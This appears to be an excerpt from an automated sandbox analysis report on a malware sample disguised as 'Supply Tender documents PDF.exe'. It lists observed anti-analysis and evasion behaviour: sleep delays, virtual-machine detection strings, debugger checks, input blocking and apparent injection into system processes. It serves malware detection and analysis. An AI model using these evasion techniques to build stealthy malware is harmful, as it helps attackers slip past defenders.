Source: C:\Windows\SysWOW64\mfpmp.exe TID: 7916	Thread sleep time: -10526000s >= -30000s
Source: C:\Windows\SysWOW64\mfpmp.exe TID: 7916	Thread sleep count: 4706 > 30
Source: C:\Windows\SysWOW64\mfpmp.exe TID: 7916	Thread sleep time: -9412000s >= -30000s
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe TID: 1912	Thread sleep time: -35000s >= -30000s

Source: C:\Windows\SysWOW64\perfhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\perfhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mfpmp.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mfpmp.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Spectrum.exe, 0000001C.00000003.1335848197.00000000004E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk Deviceb
Source: mouslingly.exe, 00000003.00000002.1179809856.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW-
Source: SensorDataService.exe, 00000017.00000003.1298688493.000000000053B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management
Source: Spectrum.exe, 0000001C.00000002.2408109161.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
Source: Spectrum.exe, 0000001C.00000003.1335671689.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001C.00000003.1335493124.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001C.00000003.1335848197.00000000004E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverdLN
Source: Spectrum.exe, 0000001C.00000003.1335493124.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000001C.00000002.2415184446.00000000004D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uMSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000.i
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1585034078.0000000000720000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1648767341.0000000000715000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1186112945.0000000000714000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1239116112.0000000000720000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.0000000000713000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1561759066.0000000000714000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1171969862.0000000000721000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1607132273.0000000000715000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.0000000000713000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1561292398.0000000000711000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.0000000000713000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Spectrum.exe, 0000001C.00000003.1335671689.00000000004D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter GHz
Source: mouslingly.exe, 00000003.00000002.1180110483.0000000000D03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: SensorDataService.exe, 00000017.00000003.1298566469.000000000052C000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001C.00000003.1337826950.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001C.00000003.1335493124.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: Spectrum.exe, 0000001C.00000003.1335848197.00000000004E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen
Source: SensorDataService.exe, 00000017.00000003.1298566469.000000000052C000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000017.00000003.1298688493.000000000053B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver0
Source: Spectrum.exe, 0000001C.00000003.1335848197.00000000004E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00L
Source: Spectrum.exe, 0000001C.00000002.2408109161.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Device
Source: NSSASn0WvLKV.exe, 00000026.00000002.2425909974.00000000007B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
Source: Supply Tender documents PDF.exe, 00000000.00000002.1159992455.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2414107394.0000000002988000.00000004.00000020.00020000.00000000.sdmp, snmptrap.exe, 0000001B.00000002.2400019581.0000000000113000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 0000001E.00000002.2411821179.000000000049C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Spectrum.exe, 0000001C.00000003.1335493124.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SensorDataService.exe, 00000017.00000003.1298566469.000000000052C000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001C.00000003.1337826950.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001C.00000003.1335493124.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
Source: SensorDataService.exe, 00000017.00000003.1298688493.000000000053B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nfNECVMWar VMware SATA CD00NDIS Virtual Net
Source: Spectrum.exe, 0000001C.00000003.1335848197.00000000004E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000r
Source: Spectrum.exe, 0000001C.00000003.1335848197.00000000004E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000001C.00000002.2408109161.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: `:N2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: Spectrum.exe, 0000001C.00000003.1339804103.00000000004E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: M2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: Spectrum.exe, 0000001C.00000003.1335493124.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
Source: Spectrum.exe, 0000001C.00000003.1335493124.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4NECVMWar VMware SATA CD00
Source: SensorDataService.exe, 00000017.00000003.1298688493.000000000053B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MTSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000001C.00000003.1339882412.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Spectrum.exe, 0000001C.00000002.2415184446.00000000004D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00
Source: SensorDataService.exe, 00000017.00000003.1298688493.000000000053B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dTSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 0000001C.00000003.1339989431.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device^QM
Source: SensorDataService.exe, 00000017.00000003.1298688493.000000000053B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: SensorDataService.exe, 00000017.00000003.1298754781.000000000052A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V Gener
Source: SensorDataService.exe, 00000017.00000003.1298754781.000000000052A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counterz
Source: Spectrum.exe, 0000001C.00000003.1339882412.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000r
Source: Spectrum.exe, 0000001C.00000002.2418059794.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001C.00000003.1339583045.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001C.00000003.1341051176.00000000004E8000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001C.00000003.1339804103.00000000004E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter,/O
Source: Spectrum.exe, 0000001C.00000003.1339761395.0000000000506000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001C.00000003.1337826950.0000000000506000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverTjP
Source: Spectrum.exe, 0000001C.00000003.1335493124.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVMware Virtual disk SCSI Disk Device

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	API call chain: ExitProcess graph end node			graph_0-181069
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	API call chain: ExitProcess graph end node			graph_0-180640

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\mfpmp.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_0337096E rdtsc

5_2_0337096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_00417D83 LdrLoadDll,

5_2_00417D83

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00473F09 BlockInput,

0_2_00473F09

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00435A7C

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0056DFF8 mov eax, dword ptr fs:[00000030h]	0_2_0056DFF8
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00C41008 mov eax, dword ptr fs:[00000030h]	0_2_00C41008
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00C426A8 mov eax, dword ptr fs:[00000030h]	0_2_00C426A8
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00C42648 mov eax, dword ptr fs:[00000030h]	0_2_00C42648
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F51130 mov eax, dword ptr fs:[00000030h]	0_2_02F51130
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F934CD mov eax, dword ptr fs:[00000030h]	0_2_02F934CD
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A61130 mov eax, dword ptr fs:[00000030h]	3_2_00A61130
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00AA34CD mov eax, dword ptr fs:[00000030h]	3_2_00AA34CD
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00CFD918 mov eax, dword ptr fs:[00000030h]	3_2_00CFD918
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00CFEFB8 mov eax, dword ptr fs:[00000030h]	3_2_00CFEFB8
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00CFEF58 mov eax, dword ptr fs:[00000030h]	3_2_00CFEF58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0340634F mov eax, dword ptr fs:[00000030h]	5_2_0340634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332C310 mov ecx, dword ptr fs:[00000030h]	5_2_0332C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03350310 mov ecx, dword ptr fs:[00000030h]	5_2_03350310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336A30B mov eax, dword ptr fs:[00000030h]	5_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336A30B mov eax, dword ptr fs:[00000030h]	5_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336A30B mov eax, dword ptr fs:[00000030h]	5_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D437C mov eax, dword ptr fs:[00000030h]	5_2_033D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03408324 mov eax, dword ptr fs:[00000030h]	5_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03408324 mov ecx, dword ptr fs:[00000030h]	5_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03408324 mov eax, dword ptr fs:[00000030h]	5_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03408324 mov eax, dword ptr fs:[00000030h]	5_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B035C mov eax, dword ptr fs:[00000030h]	5_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B035C mov eax, dword ptr fs:[00000030h]	5_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B035C mov eax, dword ptr fs:[00000030h]	5_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B035C mov ecx, dword ptr fs:[00000030h]	5_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B035C mov eax, dword ptr fs:[00000030h]	5_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B035C mov eax, dword ptr fs:[00000030h]	5_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FA352 mov eax, dword ptr fs:[00000030h]	5_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D8350 mov ecx, dword ptr fs:[00000030h]	5_2_033D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B2349 mov eax, dword ptr fs:[00000030h]	5_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03328397 mov eax, dword ptr fs:[00000030h]	5_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03328397 mov eax, dword ptr fs:[00000030h]	5_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03328397 mov eax, dword ptr fs:[00000030h]	5_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332E388 mov eax, dword ptr fs:[00000030h]	5_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332E388 mov eax, dword ptr fs:[00000030h]	5_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332E388 mov eax, dword ptr fs:[00000030h]	5_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335438F mov eax, dword ptr fs:[00000030h]	5_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335438F mov eax, dword ptr fs:[00000030h]	5_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033663FF mov eax, dword ptr fs:[00000030h]	5_2_033663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033403E9 mov eax, dword ptr fs:[00000030h]	5_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033403E9 mov eax, dword ptr fs:[00000030h]	5_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033403E9 mov eax, dword ptr fs:[00000030h]	5_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033403E9 mov eax, dword ptr fs:[00000030h]	5_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033403E9 mov eax, dword ptr fs:[00000030h]	5_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033403E9 mov eax, dword ptr fs:[00000030h]	5_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033403E9 mov eax, dword ptr fs:[00000030h]	5_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033403E9 mov eax, dword ptr fs:[00000030h]	5_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE3DB mov eax, dword ptr fs:[00000030h]	5_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE3DB mov eax, dword ptr fs:[00000030h]	5_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE3DB mov ecx, dword ptr fs:[00000030h]	5_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE3DB mov eax, dword ptr fs:[00000030h]	5_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D43D4 mov eax, dword ptr fs:[00000030h]	5_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D43D4 mov eax, dword ptr fs:[00000030h]	5_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033EC3CD mov eax, dword ptr fs:[00000030h]	5_2_033EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033383C0 mov eax, dword ptr fs:[00000030h]	5_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033383C0 mov eax, dword ptr fs:[00000030h]	5_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033383C0 mov eax, dword ptr fs:[00000030h]	5_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033383C0 mov eax, dword ptr fs:[00000030h]	5_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B63C0 mov eax, dword ptr fs:[00000030h]	5_2_033B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332823B mov eax, dword ptr fs:[00000030h]	5_2_0332823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0340625D mov eax, dword ptr fs:[00000030h]	5_2_0340625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274 mov eax, dword ptr fs:[00000030h]	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03334260 mov eax, dword ptr fs:[00000030h]	5_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03334260 mov eax, dword ptr fs:[00000030h]	5_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03334260 mov eax, dword ptr fs:[00000030h]	5_2_03334260
